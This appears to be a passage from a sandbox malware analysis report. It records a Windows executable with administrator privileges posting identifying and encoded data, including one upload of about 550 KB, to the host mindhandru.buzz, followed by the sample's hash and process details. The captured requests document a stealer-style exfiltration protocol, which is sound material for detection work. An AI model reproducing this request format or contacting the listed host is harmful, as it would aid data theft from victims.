55 0d 0a 43 6f
Data Ascii: --EGAS4F6GYUContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--EGAS4F6GYUContent-Disposition: form-data; name="pid"3--EGAS4F6GYUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--EGAS4F6GYUCo
2024-12-27 07:53:01 UTC | 5028 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-27 07:53:02 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:53:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=b7ks6jhkimvom3bbldeffj2sjn; expires=Tue, 22 Apr 2025 01:39:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OM9uNSatQ7VrNja53aaTgICAlPPLNPa%2FzGyyUvHD2SJEodyGBiIW8XfzJTrdrII%2FIV%2FL9fxPfLUAxPluXCJy10Q%2FFFMv9wAqPjMHk6HevXmfWwLhA%2Fj7F8gyiRFp%2FQxvkk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87bc09af2d72bc-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1820&rtt_var=690&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21312&delivery_rate=1576673&cwnd=252&unsent_bytes=0&cid=fad7608808e9d5c7&ts=976&x=0"
2024-12-27 07:53:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:53:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49741 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 7380 | Process: C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:53:04 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0AWTW7811TE3B9RAFW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1228
Host: mindhandru.buzz
2024-12-27 07:53:04 UTC | 1228 | OUT | Data Raw: 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 41 57 54 57 37 38 31 31 54 45 33 42 39 52 41 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
Data Ascii: --0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="pid"1--0AWTW7811TE3B9RAFWContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-27 07:53:05 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:53:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1n9r419smjuouv8agoigovs3p5; expires=Tue, 22 Apr 2025 01:39:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65ieToEKXPL9zJbmytizztKNsD6Tg4wRzdWXxPbsw2MhlTAua4UeGpDmo1wxdYj5rJSffzNbmekE5VQtNsEltUUpSrwvwUKpA%2FHbPq0SuDs5J%2BxRbScZI3P1KXBefct8CTg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87bc1afbb343d9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2328&rtt_var=1011&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2144&delivery_rate=1254295&cwnd=221&unsent_bytes=0&cid=c2b2d52b29d8db38&ts=762&x=0"
                                                                                              2024-12-27 07:53:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 07:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49748 | 104.21.11.101 | 443 | 7380 | C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:53:06 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OQWBW0WO8U7KNW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 550868
Host: mindhandru.buzz
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 51 57 42 57 30 57 4f 38 55 37 4b 4e 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 51
Data Ascii: --OQWBW0WO8U7KNWContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--OQWBW0WO8U7KNWContent-Disposition: form-data; name="pid"1--OQWBW0WO8U7KNWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OQ
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: db a4 c3 8f 36 24 6e b4 63 e5 a2 02 85 c4 e4 a5 11 89 25 cd a9 37 8b c0 67 0f d5 00 19 80 03 93 bd 48 f6 86 df 50 f0 ae 84 d5 1b 7a 79 08 4a 7d 54 f8 13 f5 27 5b 0d c1 6d a6 1b 39 82 f3 ef 12 35 31 71 88 ad f7 42 c9 a7 99 28 92 6b 97 e2 11 c6 43 5a dd 18 b2 3e 9d 11 46 46 87 4f 96 8d 61 56 cd 1a 14 a9 c4 e1 a1 ba 81 a4 31 66 42 5b 02 c7 33 ed ca 82 83 29 9d 9f a3 83 4c 14 a6 e8 a2 f8 a1 ef e8 68 d1 7b 46 db 17 51 30 0d 1a 5b dc 2e 4a dd 41 4d ab 0f 39 2a 40 78 07 12 03 f7 f0 a0 6d f4 f4 bf c6 14 5d 9c 0f 1f 95 06 5d f3 da c0 4e 5b cf 19 d1 30 89 12 29 5e 0a 00 91 fd b4 3f 7c 37 49 c7 a2 28 25 d5 c4 48 15 7b c6 3c 4b 84 3a bd aa c4 e4 45 eb 90 3b e8 60 1c e2 09 44 31 a5 17 1a 25 5f 2e a0 65 7f 4c a2 e1 bf 4e a8 72 da 54 b3 78 7c 2d e6 63 b0 76 69 93 0f 53
Data Ascii: 6$nc%7gHPzyJ}T'[m951qB(kCZ>FFOaV1fB[3)Lh{FQ0[.JAM9*@xm]]N[0)^?|7I(%H{<K:E;`D1%_.eLNrTx|-cviS
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 22 23 a4 d3 2d 10 77 98 1d 03 51 22 bd 33 20 a4 13 89 56 2c 73 9d a2 63 0b eb 88 2e 22 cc 9e 1f f7 af 2f bd 95 5a 56 b4 66 90 7b 8f 2f e2 dc c1 60 bb 73 4a 90 90 80 cc 70 27 35 32 f4 c2 97 b9 42 44 74 06 1a 05 81 b2 33 7b f3 34 70 04 21 92 1b 46 4a d8 59 82 aa 07 e7 d9 00 a9 70 f8 ed b2 5b 8e af 80 51 56 ef 19 05 0d 85 8b e7 86 ce bc f1 5a de be 72 6a b8 f4 c1 4c d9 0d 33 fd 81 bc 97 9c b0 9d 96 b9 3b 08 dd fb d9 6f 90 73 7f af 6f 3d fe 1c c6 e4 ee 49 d4 e8 27 6f 2e ac 9c c3 01 86 cb 6b 6e 2d a3 b9 75 7a 28 b0 dc 68 b6 14 d5 44 25 0d 33 10 cc 83 3d fe bc 3a 74 e8 97 ab 51 9a 7d 5f 40 a8 e3 40 8b d8 f3 d1 b6 ba e8 ef 42 c9 33 55 fa 09 7c 6f b4 2c 33 aa ff 45 87 5f d5 74 74 df f8 2e 1d ba 5e ae 8b 75 55 28 8e e4 73 64 56 46 bf 5f b3 72 e6 be 3a ab 31 86 7b
Data Ascii: "#-wQ"3 V,sc."/ZVf{/`sJp'52BDt3{4p!FJYp[QVZrjL3;oso=I'o.kn-uz(hD%3=:tQ}_@@B3U|o,3E_tt.^uU(sdVF_r:1{
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 44 e6 ed 38 7a c2 a7 87 54 fd ce 0d 9a 5a 74 7a 65 03 8a ce 7d ee 0c f1 d3 01 e9 70 a4 b9 1f cb a6 31 23 0d 83 cb 94 1b 8f b6 ef cb 99 33 ca 1d b2 ee bd 6a 18 c3 79 b9 57 dc f4 28 76 a4 b1 24 74 6a b3 80 48 4c 24 9a 1b d2 c9 b6 7d 19 b9 f4 6b 73 06 b9 cb 12 65 cd bb 1f 76 c5 22 5e 9b eb d7 62 c3 ce 3b ea 01 12 66 57 e2 d3 4c 82 95 67 14 46 9d 67 3a e7 64 6e e0 52 9f b6 40 57 76 a9 1a 52 93 f8 5c bf e9 b7 ff e8 bc 31 97 a6 83 3b 26 ab d7 0e f4 54 aa e2 6b ab 7d 68 e0 5e d2 c9 e2 d5 60 c3 5d 45 29 52 ed 9a 57 cd a1 3e 88 50 23 61 86 4b 43 30 9e 37 86 7b b3 b8 b3 19 83 39 df 3e 71 b3 09 db d8 98 87 a2 63 5a bf e7 2d f7 84 95 5e f4 de f6 49 53 16 ff f8 a1 6a f3 a6 af f8 58 da 43 48 bf 74 db f3 74 fa 53 23 3d b8 e2 12 f2 e9 9e ef 8a 38 e6 ea 49 d8 4d f7 5c e8
Data Ascii: D8zTZtze}p1#3jyW(v$tjHL$}ksev"^b;fWLgFg:dnR@WvR\1;&Tk}h^`]E)RW>P#aKC07{9>qcZ-^ISjXCHttS#=8IM\
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 5a 7a 2d b3 36 28 ed 27 55 4a 61 ac 25 85 66 13 44 bb cd 7b cd bc 9f 31 67 bb bf 9e 3e f9 4a 1c a4 7c 1a e8 57 a1 94 6f ec a1 eb 3f 0a 74 f7 6c 59 36 28 1c f8 30 d4 a3 23 7b 66 20 b0 3f e4 f6 61 1e 0c f7 e6 51 c9 99 b5 84 04 8e 44 6a be fc ae 5d 5c 60 8f 12 86 a1 b0 32 7d 90 ad aa 46 75 78 31 5f a5 fb 8c 27 29 f5 eb e3 ad 8c 7d 4e f8 fc 84 fc f8 af b2 84 05 c9 f9 92 da fe 5d fc bf e4 63 02 e9 86 ac d8 fa ad 39 1f e2 c3 85 c4 78 a3 1a 23 0f 74 47 57 5e ca bc 8b 0c 92 c0 9e fb 92 56 63 a0 2b 95 d8 6c 60 3b 53 fd 2c 34 19 8d c4 35 0f fb 37 16 99 60 d2 f3 37 c2 cd e4 42 e5 d6 b8 b9 26 d7 0b be ca 05 dd 3a fb 3c c2 43 af eb c3 6b 38 81 ae dc fe ce 6d a4 02 e3 4e 58 5b 3f 95 df 70 29 f8 4e 48 fa dc f5 36 95 57 37 0d ec 04 e5 de 7c 4f 68 3e 9e 8c f6 2c a4 a8 8e
Data Ascii: Zz-6('UJa%fD{1g>J|Wo?tlY6(0#{f ?aQDj]\`2}Fux1_')}N]c9x#tGW^Vc+l`;S,457`7B&:<Ck8mNX[?p)NH6W7|Oh>,
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 0b fb e4 9f 44 07 40 7a 8c 43 ac 44 f5 76 11 ea e9 db 8d cf e3 29 92 8e b3 7c e0 60 e3 f4 9f 94 23 44 24 5b 23 b0 24 1d fd 7b fe 33 81 45 80 b9 cb ce 41 ff 42 7a 42 62 5e 0e 23 9c da 52 ba e5 53 81 17 ba 98 b2 2a 76 1f 53 96 b6 fc ac a1 94 24 27 43 9b e2 3a bf 3f bd 14 12 9c e6 33 34 90 e2 f0 85 1a 69 a2 55 b9 fc 45 67 14 85 f7 ac b7 05 f2 40 43 42 a3 3a 76 3b 53 7e 3c 51 a5 15 e7 31 70 b9 d5 3a c2 e7 32 2b 9f 4d dc 7c 87 75 21 0f db 85 de 35 81 d2 83 8b 72 0d 6d 51 46 3b ea 22 ea 1a 84 c2 68 90 83 aa 74 1b 96 04 8e 72 8c fc 53 e5 6a f5 0b 21 0b 7c fa b9 ec e8 63 a5 db 60 89 b1 3e 22 9b 2b 7f 20 9b 94 68 4e d6 e0 5d b6 37 fa 5a 7f 8f a9 5d 3c 3e 52 aa c8 f2 6e ae 10 1f ad 96 70 1d 92 bb 0a a5 37 73 b7 bb 18 e9 c5 7c b4 47 51 fa 5c 24 69 d0 c4 d9 68 39 26
Data Ascii: D@zCDv)|`#D$[#${3EABzBb^#RS*vS$'C:?34iUEg@CB:v;S~<Q1p:2+M|u!5rmQF;"htrSj!|c`>"+ hN]7Z]<>Rnp7s|GQ\$ih9&
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: fe b1 ff cc b5 f8 43 3d f6 2d bf 9c c7 3c 9f 86 24 29 80 d8 b6 8a b9 9c a9 b7 ae dc 0f 48 ae 4b c5 8f a3 14 2f d0 f7 5d c7 74 e3 5e 8c 7f f8 2b 68 e3 02 60 be 5d 88 28 df 1a df c8 13 f1 a1 9d 99 d6 0f f4 ec ce 30 de 19 ee dd b4 fa 2d 1f f3 a7 e0 08 66 e9 51 ae ff d8 95 0c 73 31 d7 9d ef a7 8b 35 c5 dd 1e 63 07 e2 20 e4 50 88 d4 dc 3f b7 4f 4a bd f4 25 60 90 23 37 ec f5 20 47 dd f9 56 42 ed c9 f4 54 11 33 41 56 e1 c8 c4 84 80 9a 5e 6b 12 ca fe 0e d7 fa c4 a1 8a ff 33 21 72 ab 33 de 15 31 ba 0b 7a 2a 77 7b 08 af c4 b1 69 97 7e e3 0a a6 da 5f 74 68 da 7c 6b 37 bd 0f 51 c2 b2 8b 5c 41 b3 95 bf 64 d3 48 36 e8 88 26 a0 61 14 f9 9c 22 50 ff 2f 08 63 fd eb 48 8c cf 2f 69 7f 97 c1 76 c3 05 fe 10 a9 fd 04 ab a7 b1 b2 c8 32 2f 00 4b 00 fc af f9 ce 66 cd 09 30 1d 41
Data Ascii: C=-<$)HK/]t^+h`](0-fQs15c P?OJ%`#7 GVBT3AV^k3!r31z*w{i~_th|k7Q\AdH6&a"P/cH/iv2/Kf0A
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 5a 0f 63 2c bb 4d c2 b2 f2 33 02 fd 94 07 e5 de 1d 69 40 10 1e 6e 6d 2f 71 99 37 27 b4 7a a5 bc ed 36 a7 86 0a 17 c5 44 e7 4d de 7f 4f 8a 98 75 d1 65 9d 26 73 42 b9 e4 92 08 66 61 f1 ad c9 09 fe 10 cc e8 e3 35 3d e4 cf a0 8f ed da a7 22 3a eb 75 f3 46 a9 49 5e df 62 ca fa e3 e7 b1 6b 76 da 6c 2c f3 83 7c c3 b1 98 77 ae 96 b3 ba e6 a6 68 f2 73 4e c6 bb 6d 51 e3 8d 6c aa d8 1a 1c 00 07 f1 b2 03 e2 87 be 15 dc 94 50 dc 08 c7 20 19 31 e5 a9 34 b7 b9 34 47 84 d3 e5 9d 69 fb 09 6d a2 1f 02 50 9d e5 5a 96 5a 06 1c 55 03 c4 1f 44 83 2c c1 84 66 62 6e ac b1 86 6d 23 88 02 e5 20 f0 6a c2 f5 31 bf 67 a2 e1 8d bb 04 1f fe 9e 4a d8 28 cb 4b d8 3a 6e c7 d8 bc 9c 29 eb 11 c9 4e 9a c8 a6 79 d5 47 aa b1 13 f6 d3 50 28 ed 6f 54 38 ea 0d 69 77 63 98 fe 52 f2 37 aa 3a bb a3
Data Ascii: Zc,M3i@nm/q7'z6DMOue&sBfa5=":uFI^bkvl,|whsNmQlP 144GimPZZUD,fbnm# j1gJ(K:n)NyGP(oT8iwcR7:
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: ef 6e e6 16 15 1c 2c 4b 06 3d a1 4e 98 7d 99 50 0c 1b 57 71 01 43 4f b0 78 50 c8 29 1d dd 21 78 c0 8d 12 7e f3 91 c7 07 a7 d8 85 6d 78 11 85 30 47 7e 96 99 43 7d 69 f0 d4 2d d4 86 aa d1 b6 bf d0 06 24 72 23 c9 23 0c 0d 62 55 78 22 3a 43 cc ea da 69 ab 4a f5 cb 97 a2 94 54 aa 49 2b d0 2f b3 f4 99 dc 7b ae 33 22 5d c1 c4 b8 88 d8 b8 d8 3b 87 d5 e4 9d 62 c5 66 25 97 10 82 53 96 c5 f1 1e 83 01 19 d9 b8 1d cc 4e 9d f4 7a 9d 88 b3 97 a8 fd 88 82 f6 7e 9c b7 07 df f4 cf 37 2b f4 1d cb 5a c9 d6 66 86 82 b6 93 d8 69 97 d7 b8 9d 55 6c ec b2 c4 df 77 cb 16 6b 6f 0f 89 b7 7a c4 25 b0 76 8f 2a 16 0a 0e 87 b8 f3 3e 9b 15 f0 17 cb c1 0f 6e 63 fa 8b 22 78 62 85 86 7f f9 ce cd 51 a2 ee 27 65 5a fe 43 4a 0a d1 e6 79 dd 1d c9 4e b3 e6 4b 62 3e a2 b7 ea 3e d5 62 d7 d5 97 79
Data Ascii: n,K=N}PWqCOxP)!x~mx0G~C}i-$r##bUx":CiJTI+/{3"];bf%SNz~7+ZfiUlwkoz%v*>nc"xbQ'eZCJyNKb>>by
2024-12-27 07:53:06 UTC | 15331 | OUT | Data Raw: 9b 38 de f1 c3 c7 ac 7e 32 8c 51 fe 2c 4d 16 eb 81 3f 7e 24 da 90 f4 f9 b0 ee fb c1 05 cd c4 d3 a3 25 59 8b 5a 8c c7 58 c4 1f f1 41 a7 86 5b d4 e5 be 23 17 9a ed 2f ef a7 a7 82 3a 45 2f 08 1e 7a 94 d0 2a 09 f4 2e 9c e2 03 8f e4 c3 0d f9 c1 ac c3 df ef a3 77 d0 bc f5 a8 27 0b 3c 21 d7 72 5a 7b 9b 6c c1 13 fe bc e2 a2 6d b8 d6 52 4c 08 12 f0 43 f9 3c 77 13 eb ef 7c 95 fd 7d 25 57 98 e6 36 04 08 41 98 f3 90 05 1a 3e c7 ae e7 90 2d 2d 23 74 ab b8 78 1a 4f 0f 8f 6e 94 e0 6c 1d 63 24 19 07 a6 f3 69 36 2a b4 ca 3c 4d 33 fc ea a8 48 ac 79 41 5f 7d e5 f6 ed e1 07 3e b6 5b 18 0b 02 fe 0d ec 5f 2c 57 75 fe 8f 01 94 dd 26 f0 e2 a9 cd cb 00 ee 14 68 d8 60 62 c8 db f0 6e 69 48 ab f8 ec 91 e7 31 a2 75 c6 78 25 1a f1 c4 27 dd db 8c 22 70 4b d1 5a 31 d8 cb 16 50 e2 47 14
Data Ascii: 8~2Q,M?~$%YZXA[#/:E/z*.w'<!rZ{lmRLC<w|}%W6A>--#txOnlc$i6*<M3HyA_}>[_,Wu&h`bniH1ux%'"pKZ1PG
2024-12-27 07:53:10 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:53:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cfk2qlht46gncg67ng73846cd8; expires=Tue, 22 Apr 2025 01:39:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Knf4rI%2BMP%2B5pKqvc9KdO0u%2BvLUrYW32ei5N0Ww75wTFntjcNAgOYUpY1OHNYncLea9GlrA0AKHcPIhBZVXXiBD2%2BR3mFBzmHNJ5CIa%2BXE0NhAbacbtHkdoaAE0CzL%2BNnsbo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87bc2b0fd9c326-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=304&recv=571&lost=0&retrans=0&sent_bytes=2838&recv_bytes=553344&delivery_rate=1940199&cwnd=240&unsent_bytes=0&cid=bcfa799b13356755&ts=4134&x=0"


Target ID: 0
Start time: 02:52:41
Start date: 27/12/2024
Path: C:\Users\user\Desktop\ARoqFi68Nr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ARoqFi68Nr.exe"
Imagebase: 0x560000
File size: 2'935'296 bytes
MD5 hash: D867E39681DBE1564BCDD21D773E668B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

No disassembly